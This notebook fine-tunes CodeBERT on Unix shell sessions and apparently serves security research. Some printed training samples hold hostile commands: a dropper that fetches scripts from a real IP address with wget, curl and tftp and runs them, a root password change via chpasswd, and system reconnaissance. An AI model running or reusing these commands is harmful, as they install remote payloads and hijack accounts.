# Domain Adaptation
## This notebook performs domain adaptation of an existing language model (LM) on Unix shell sessions

### N.b. For the domain adaptation step, refer to:
#### https://huggingface.co/course/chapter7/3?fw=pt

### Check if CUDA is available:

In [1]:
import torch
num_devices = torch.cuda.device_count()
print(f"Number of CUDA devices: {num_devices}")
# Fall back to the CPU so that `device` is always defined
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")

True

### Reduce warning and logging verbosity

In [None]:
import warnings
import datasets
warnings.simplefilter(action='ignore', category=FutureWarning)
datasets.utils.logging.set_verbosity(datasets.utils.logging.ERROR)
datasets.utils.logging.enable_progress_bar()

import transformers
transformers.utils.logging.set_verbosity(transformers.utils.logging.ERROR)
transformers.utils.logging.enable_progress_bar()

### Import config

In [4]:
import json
with open("../config.json") as f:
    config = json.load(f)

### First import the dataset

In [5]:
from datasets import load_dataset
INPUT_PATH = "../Dataset/Training/Self_Supervised/"

data_files = {"train": f"{INPUT_PATH}/training_set.csv", "validation": f"{INPUT_PATH}/validation_set.csv"}
dataset = load_dataset("csv", data_files=data_files)


In [6]:
dataset

DatasetDict({
    train: Dataset({
        features: ['sessions'],
        num_rows: 15856
    })
    validation: Dataset({
        features: ['sessions'],
        num_rows: 3964
    })
})

### Create features

In [7]:
from datasets import Features, Sequence, Value, ClassLabel
features = Features(
    {
        'sessions': Value(dtype='string', id=None),
    }
)

#### Not useful here but kept for compatibility
##### Elements are already strings

In [8]:
def process(ex):
    # Identity mapping: the map call below only applies the declared features
    return {"sessions": ex["sessions"]}
dataset = dataset.map(process, features=features)



### Import pre-trained tokenizer
#### Must be consistent with following model

In [10]:
import os
chosen_tokenizer = "microsoft/codebert-base"
# Cache so that we don't have to download the same model multiple times
cache_folder = f"./Tokenizer/{chosen_tokenizer}/"
os.makedirs(cache_folder, exist_ok=True)

### AutoTokenizer classes are here:

https://huggingface.co/docs/transformers/v4.25.1/en/model_doc/auto#transformers.AutoTokenizer

In [12]:
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(chosen_tokenizer, cache_dir=f"{cache_folder}cache")  # Reuses the cached copy if already downloaded

### Notice (citing https://huggingface.co/course/chapter7/3?fw=pt)
For both auto-regressive and masked language modeling, a common preprocessing step is to concatenate all the examples and then split the whole corpus into chunks of equal size. This is quite different from our usual approach, where we simply tokenize individual examples. Why concatenate everything together? The reason is that individual examples might get truncated if they’re too long, and that would result in losing information that might be useful for the language modeling task!
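
A minimal sketch of the difference, using made-up token lists rather than real tokenizer output (the lengths and the `max_length` of 8 are illustrative assumptions, and all names are hypothetical). Truncation discards everything beyond the limit in each example, whereas concatenating and chunking loses at most one incomplete trailing chunk.

```python
# Toy token-id lists standing in for tokenized sessions (hypothetical values).
toy_examples = [list(range(20)), list(range(3)), list(range(9))]
max_length = 8  # illustrative limit, far smaller than a real model's

# Approach 1: truncate each example independently.
truncated = [ex[:max_length] for ex in toy_examples]
kept_by_truncation = sum(len(ex) for ex in truncated)

# Approach 2: concatenate everything, then split into equal-size chunks,
# dropping only the final incomplete chunk (if any).
concatenated = [tok for ex in toy_examples for tok in ex]
usable = (len(concatenated) // max_length) * max_length
toy_chunks = [concatenated[i : i + max_length] for i in range(0, usable, max_length)]
kept_by_chunking = sum(len(c) for c in toy_chunks)

total = sum(len(ex) for ex in toy_examples)
print(f"total tokens:       {total}")
print(f"kept by truncation: {kept_by_truncation}")
print(f"kept by chunking:   {kept_by_chunking}")
```

With these toy lengths the long first example loses most of its tokens under truncation, while chunking keeps them by spreading them over several chunks.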

### Define tokenizing function

In [16]:
def tokenize_function(examples):
    result = tokenizer(examples["sessions"])
    if tokenizer.is_fast:
        result["word_ids"] = [result.word_ids(i) for i in range(len(result["input_ids"]))]
    return result

# Use batched=True to activate fast multithreading!
tokenized_datasets = dataset.map(
    tokenize_function, batched=True, remove_columns=["sessions"]
)
tokenized_datasets


Token indices sequence length is longer than the specified maximum sequence length for this model (811 > 512). Running this sequence through the model will result in indexing errors


DatasetDict({
    train: Dataset({
        features: ['input_ids', 'attention_mask', 'word_ids'],
        num_rows: 15856
    })
    validation: Dataset({
        features: ['input_ids', 'attention_mask', 'word_ids'],
        num_rows: 3964
    })
})

### Let's visualize an example of how tokenization is performed

In [17]:
sample = dataset["train"].shuffle(seed=42).select(range(1))['sessions']
tokenized_sample = tokenizer(sample, add_special_tokens=True, truncation=True, max_length=512)



In [18]:
print(f"Sample:\n{sample}")
print(f"\nTokenized Sample (going to be truncated if > 512):\n{tokenized_sample.tokens()}")

Sample:
['uname -s uname -r uname -m uname -p || echo uname -v ; cat /etc/debian_release ; cat /etc/debian_version ; cat /etc/redhat-release ; cat /etc/redhat_version ; cat /etc/os-release ; cat /etc/SuSE-release ; cat /etc/fedora-release ; cat /etc/slackware-release ; cat /etc/slackware-version ; cat /etc/system-release ; cat /etc/mandrake-release ; cat /etc/yellowdog-release ; cat /etc/gentoo-release ; cat /etc/UnitedLinux-release ; cat /etc/vmware-release ; vmware -v ; uname -s uname -r uname -m uname -p || echo uname -v ; cat /etc/debian_release ; cat /etc/debian_version ; cat /etc/redhat-release ; cat /etc/enterprise-release ; cat /etc/fedora-release ; cat /etc/alpine-release ; cat /etc/slackware-release ; cat /etc/euleros-release ; cat /etc/slackware-version ; cat /etc/lsb-release ; cat /etc/system-release ; id ; cat /etc/mandrake-release ; cat /etc/yellowdog-release ; echo ; cat /etc/gentoo-release ; cat /etc/UnitedLinux-release ; echo ; cat /etc/vmware-release ; id ; vmware -v 

### Let's define the fixed size we will feed to our model

Note that using a small chunk size can be detrimental in real-world scenarios, so you should use a size that corresponds to the use case you will apply your model to.

In [20]:
chunk_size = 256 #max is 512 for the chosen model

### Example showing how the mechanism works

In [21]:
# Slicing produces a list of lists for each feature
tokenized_samples = tokenized_datasets["train"][:5]

for idx, sample in enumerate(tokenized_samples["input_ids"]):
    print(f"'Session {idx} length: {len(sample)}'")

'Session 0 length: 132'
'Session 1 length: 14'
'Session 2 length: 255'
'Session 3 length: 15'
'Session 4 length: 16'


### Concatenate them

In [22]:
concatenated_examples = {
    k: sum(tokenized_samples[k], []) for k in tokenized_samples.keys()
}
total_length = len(concatenated_examples["input_ids"])
print(f"'Concatenated sessions length: {total_length}'")

'Concatenated sessions length: 432'


### Now divide concatenation into chunks and make sure none is bigger than chosen size

In [23]:
chunks = {
    k: [t[i : i + chunk_size] for i in range(0, total_length, chunk_size)]
    for k, t in concatenated_examples.items()
}

for chunk in chunks["input_ids"]:
    print(f"'Chunk length: {len(chunk)}'")

'Chunk length: 256'
'Chunk length: 176'


### Create a function that systematically groups sessions

#### Chunks smaller than chunk_size will be removed

In [24]:
def group_texts(examples):
    # Concatenate all texts
    concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()}
    # Compute length of concatenated texts
    total_length = len(concatenated_examples[list(examples.keys())[0]])
    # We drop the last chunk if it's smaller than chunk_size
    total_length = (total_length // chunk_size) * chunk_size
    # Split into chunks of chunk_size
    result = {
        k: [t[i : i + chunk_size] for i in range(0, total_length, chunk_size)]
        for k, t in concatenated_examples.items()
    }
    # Create a new labels column
    result["labels"] = result["input_ids"].copy()
    return result
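
As a quick check of the drop-remainder rule, the sketch below applies the same arithmetic to the five session lengths printed earlier (132, 14, 255, 15, 16) with `chunk_size = 256`. The variable names are illustrative and not part of the notebook.

```python
session_lengths = [132, 14, 255, 15, 16]  # lengths printed by the earlier example
chunk_size = 256

total_length = sum(session_lengths)
# Quotient = number of full chunks kept, remainder = tokens that get dropped
full_chunks, dropped_tokens = divmod(total_length, chunk_size)

print(f"total tokens:   {total_length}")
print(f"full chunks:    {full_chunks}")
print(f"dropped tokens: {dropped_tokens}")
```

Because `map(..., batched=True)` calls the function once per batch (1000 examples by default in `datasets`), a remainder is dropped for every batch rather than once for the whole corpus.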

Note that in the last step of group_texts() we create a new labels column which is a copy of the input_ids one. 

As we’ll see shortly, that’s because in masked language modeling the objective is to predict randomly masked tokens in the input batch, and by creating a labels column we provide the ground truth for our language model to learn from.
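
To make the role of `labels` concrete, here is a simplified, pure-Python sketch of masking. It is not the implementation of `DataCollatorForLanguageModeling`: the real collator works on tensors, skips special tokens, and replaces only about 80% of the selected positions with the mask token (10% get a random token and 10% stay unchanged). The function name, the token ids, and the mask id below are hypothetical. What the sketch shares with the collator is the convention that unselected positions get the label `-100`, which the loss ignores.

```python
import random

IGNORE_INDEX = -100  # label value skipped by PyTorch's cross-entropy loss


def mask_tokens(input_ids, labels, mask_token_id, mlm_probability=0.15, seed=0):
    """Return (masked_inputs, masked_labels) for one chunk.

    Simplified: every selected position is replaced by the mask token.
    """
    rng = random.Random(seed)
    masked_inputs, masked_labels = [], []
    for token, label in zip(input_ids, labels):
        if rng.random() < mlm_probability:
            masked_inputs.append(mask_token_id)  # hide the token from the model
            masked_labels.append(label)          # keep the ground truth here
        else:
            masked_inputs.append(token)          # token stays visible
            masked_labels.append(IGNORE_INDEX)   # no loss at this position
    return masked_inputs, masked_labels


# Hypothetical chunk: ids 100..119, with labels starting as a copy of input_ids.
input_ids = list(range(100, 120))
labels = input_ids.copy()
masked_inputs, masked_labels = mask_tokens(input_ids, labels, mask_token_id=4)

print(masked_inputs)
print(masked_labels)
```

Only the masked positions carry a real label, so the model is scored exclusively on the tokens it could not see.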

In [25]:
lm_datasets = tokenized_datasets.map(group_texts, batched=True)
lm_datasets


DatasetDict({
    train: Dataset({
        features: ['input_ids', 'attention_mask', 'word_ids', 'labels'],
        num_rows: 31865
    })
    validation: Dataset({
        features: ['input_ids', 'attention_mask', 'word_ids', 'labels'],
        num_rows: 4594
    })
})

### Now create DataCollator

In [26]:
from transformers import DataCollatorForLanguageModeling
# Mask 15% of the tokens, the rate used in the BERT paper
data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm_probability=0.15)

#### An example:

In [27]:
samples = [lm_datasets["train"][i] for i in range(1)]
for sample in samples:
    _ = sample.pop("word_ids")

print(dataset["train"].select(range(1))['sessions'])
    
for chunk in data_collator(samples)["input_ids"]:
    print(f"\n'>>> {tokenizer.decode(chunk)}'")

You're using a RobertaTokenizerFast tokenizer. Please note that with a fast tokenizer, using the `__call__` method is faster than using a method to encode the text followed by a call to the `pad` method to get a padded encoding.


['echo cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.45.139/bin.sh || curl http://46.246.45.139/curl.sh -o curl.sh || tftp 46.246.45.139 -c get tftp.sh || tftp -r tftp.sh -g 46.246.45.139; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh | sh ;']

'>>> <s>echo cd responses<mask> || cd /var/run || cd /mnt ||<mask><mask>root || cd / && rm *.sh<mask> wget http://46.246.45.139/bin.sh || curl http://46.246.45<mask>139/curl.sh -o curl.sh || tft<mask> 46.246.45.139 -c get tftp.sh || t<mask>p -r tftp.sh -g 46.246.45.139; chmod + Elim *.sh<mask>./bin.sh;./curl.sh;<mask>tft<mask>.sh | sh ;</s><s>TMP<mask>FILE="$(mktemp -t)"</s><s><mask> /proc/cpuinfo | grep name | wc -<mask> ; Madden root<mask>bDYt2moltyac | chpasswd |<mask> ; echo 321 > /var/tmp<mask>var03522123 ;<mask><mask><mask> /var/tmp/. scratches<mask><mask>123 ; cat /var/tmp/.<mask>03522123 | head -n 1 ; cat /proc/cpuinfo | grep name | head -<mask> 1 | awk {<mask> $<mask>,$5,$6, Whit7<mask><mask>8,'


### Instantiate a pre-trained model

In [28]:
from transformers import Trainer, TrainingArguments, AutoModelForMaskedLM
chosen_model = "microsoft/codebert-base"
cache_folder = f"./Model_folder/{chosen_model}/"  # Same caching scheme as for the tokenizer
os.makedirs(cache_folder, exist_ok=True)
model = AutoModelForMaskedLM.from_pretrained(chosen_model, cache_dir=f"{cache_folder}cache")  # Reuses the cached copy if already downloaded


Some weights of RobertaForMaskedLM were not initialized from the model checkpoint at microsoft/codebert-base and are newly initialized: ['lm_head.layer_norm.bias', 'lm_head.layer_norm.weight', 'lm_head.bias', 'lm_head.dense.weight', 'lm_head.dense.bias']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


### Create trainer

In [30]:
if len(chosen_model.split("/")) > 1:
    chosen_model = chosen_model.split("/")[-1]

finetuned_model_folder = f"./Finetuned_model/{chosen_model}_bash_finetuned/"
os.makedirs(finetuned_model_folder, exist_ok = True)

In [31]:
chosen_model

'codebert-base'

In [32]:
# To save only best model in training > https://discuss.huggingface.co/t/save-only-best-model-in-trainer/8442/3
training_epochs = 5
batch_size = 16
# Show the training loss with every epoch
logging_steps = len(lm_datasets["train"]) // batch_size
# Not defined in the cells shown here; value inferred from the output path in the training log
tokenizer_choice = "pretrained"

fp16 = torch.cuda.is_available()  # Mixed precision is only enabled when a GPU is present

training_args = TrainingArguments(
    output_dir=f"{finetuned_model_folder}tokenizer_{tokenizer_choice}_epochs_{training_epochs}_padded_{chunk_size}/",  # output directory
    overwrite_output_dir=True,  # overwrite the output directory (do not resume from cached content)
    num_train_epochs=training_epochs,  # number of training epochs
    per_device_train_batch_size=batch_size,  # batch size for training
    per_device_eval_batch_size=batch_size,  # batch size for evaluation
    learning_rate=1e-5,
    evaluation_strategy="epoch",
    save_strategy="epoch",
    save_total_limit=1,
    load_best_model_at_end=True,
    logging_steps=logging_steps,
    fp16=fp16,  # reduces memory requirements
)

trainer = Trainer(
    model=model,
    args=training_args,
    data_collator=data_collator,
    train_dataset=lm_datasets["train"],
    eval_dataset=lm_datasets["validation"],
    tokenizer=tokenizer,
)

Using cuda_amp half precision backend


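### Perplexity before fine-tuning

The value is expected to be very high: as the loading warning above reports, the `lm_head` weights are not in the `microsoft/codebert-base` checkpoint and are newly initialized.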

In [33]:
import math
eval_results = trainer.evaluate()
print(f">>> Perplexity: {math.exp(eval_results['eval_loss']):.2f}")

The following columns in the evaluation set don't have a corresponding argument in `RobertaForMaskedLM.forward` and have been ignored: word_ids. If word_ids are not expected by `RobertaForMaskedLM.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 4594
  Batch size = 16


>>> Perplexity: 42874495.18


#### Training function

In [34]:
trainer.train()

***** Running training *****
  Num examples = 31865
  Num Epochs = 5
  Instantaneous batch size per device = 16
  Total train batch size (w. parallel, distributed & accumulation) = 16
  Gradient Accumulation steps = 1
  Total optimization steps = 9960
  Number of trainable parameters = 124697433
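
The step counts in this log follow from the dataset size and the batch size. A quick sanity check, assuming a single device and no gradient accumulation (as the log reports); the variable names are illustrative:

```python
import math

num_examples = 31865  # "Num examples" in the log
batch_size = 16       # per-device batch size, single device
num_epochs = 5

# The last batch of each epoch is partial, hence the ceiling
steps_per_epoch = math.ceil(num_examples / batch_size)
total_steps = steps_per_epoch * num_epochs

print(f"steps per epoch: {steps_per_epoch}")
print(f"total optimization steps: {total_steps}")
```

The per-epoch figure also matches the `checkpoint-1992` directory name in the log, which corresponds to the end of the first epoch.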


Epoch,Training Loss,Validation Loss
1,0.8596,0.852938
2,0.6475,0.680905
3,0.5609,0.607771
4,0.5136,0.575645
5,0.5151,0.566897


***** Running Evaluation *****
  Num examples = 4594
  Batch size = 16
Saving model checkpoint to /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/checkpoint-1992
Configuration saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/checkpoint-1992/config.json
Model weights saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/checkpoint-1992/pytorch_model.bin
tokenizer config file saved in /share/smartdata/huawei

TrainOutput(global_step=9960, training_loss=0.7048988158444324, metrics={'train_runtime': 1439.6097, 'train_samples_per_second': 110.672, 'train_steps_per_second': 6.919, 'total_flos': 2.09723849698176e+16, 'train_loss': 0.7048988158444324, 'epoch': 5.0})
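
The perplexity figures reported in this notebook are simply the exponential of the evaluation loss, so they can be cross-checked against the validation loss in the table above. The sketch assumes that the epoch-5 checkpoint is the one evaluated after training, which is consistent with `load_best_model_at_end` since that epoch has the lowest validation loss.

```python
import math

final_validation_loss = 0.566897  # epoch 5, from the training table
perplexity = math.exp(final_validation_loss)
print(f">>> Perplexity: {perplexity:.2f}")

# Inverting the formula recovers the loss behind the perplexity
# measured before fine-tuning.
initial_perplexity = 42874495.18
initial_loss = math.log(initial_perplexity)
print(f"Initial eval loss: {initial_loss:.2f}")
```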

### Perplexity after fine-tuning

In [35]:
eval_results = trainer.evaluate()
print(f">>> Perplexity: {math.exp(eval_results['eval_loss']):.2f}")

***** Running Evaluation *****
  Num examples = 4594
  Batch size = 16


>>> Perplexity: 1.76


### Saving model

In [36]:
trainer.save_model() # Model will be available at the output_dir folder

Saving model checkpoint to /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/
Configuration saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/config.json
Model weights saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/pytorch_model.bin
tokenizer config file saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/tokenizer_config.json
Special tokens file saved in /share/smartdata/huawei/Sessions_representations/sessions-representation/Finetuned_models/codebert-base_bash_finetuned/tokenizer_pretrained_epochs_5_padded_256/special_tokens